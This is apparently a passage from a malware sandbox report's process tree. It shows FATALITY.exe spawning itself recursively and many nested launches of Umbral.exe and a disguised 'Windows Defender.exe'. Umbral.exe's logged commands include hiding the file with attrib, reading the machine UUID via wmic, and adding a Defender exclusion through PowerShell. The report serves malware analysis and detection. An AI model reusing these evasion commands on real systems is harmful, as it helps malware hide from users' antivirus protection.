        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        248⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        249⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        250⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        251⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        252⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        253⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        254⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        255⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        256⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        257⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        258⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        259⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        260⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        261⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        262⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        263⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        264⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        265⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        266⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        267⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        268⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        269⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        270⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        271⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        272⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        273⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        274⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        275⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        276⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        277⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        278⤵
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        279⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        280⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        281⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        282⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        283⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        284⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        285⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        286⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        287⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        288⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        289⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        290⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        291⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        292⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        293⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        294⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        295⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        296⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        297⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        298⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        299⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        300⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        301⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        302⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        303⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        304⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        305⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        306⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        307⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        308⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        309⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        310⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        311⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        312⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        313⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        314⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        315⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        316⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        317⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\FATALITY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FATALITY.exe"
        318⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        317⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        317⤵
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        316⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        316⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        315⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        315⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        314⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        314⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        313⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        313⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        312⤵
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        312⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        311⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        311⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        310⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        310⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        309⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        309⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        308⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        308⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        307⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        307⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        306⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        306⤵
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        305⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        305⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        304⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        304⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        303⤵
        
        PID:4948
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        304⤵
        
        PID:1920
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        304⤵
        Views/modifies file attributes
        
        PID:2316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        304⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        303⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        302⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        302⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        301⤵
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        301⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        300⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        300⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        299⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        299⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        298⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        298⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        297⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        297⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        296⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        296⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        295⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        295⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        294⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        294⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        293⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        293⤵
        
        PID:3760
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        292⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        292⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        291⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        291⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        290⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        290⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        289⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        289⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        288⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        288⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        287⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        287⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        286⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        286⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        285⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        285⤵
        
        PID:372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        284⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        284⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        283⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        283⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        282⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        282⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        281⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        281⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        280⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        280⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        279⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        279⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        278⤵
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        278⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        277⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        277⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        276⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        276⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        275⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        275⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        274⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        274⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        273⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        273⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        272⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        272⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        271⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        271⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        270⤵
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        270⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        269⤵
        
        PID:8
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        269⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        268⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        268⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        267⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        267⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        266⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        266⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        265⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        265⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
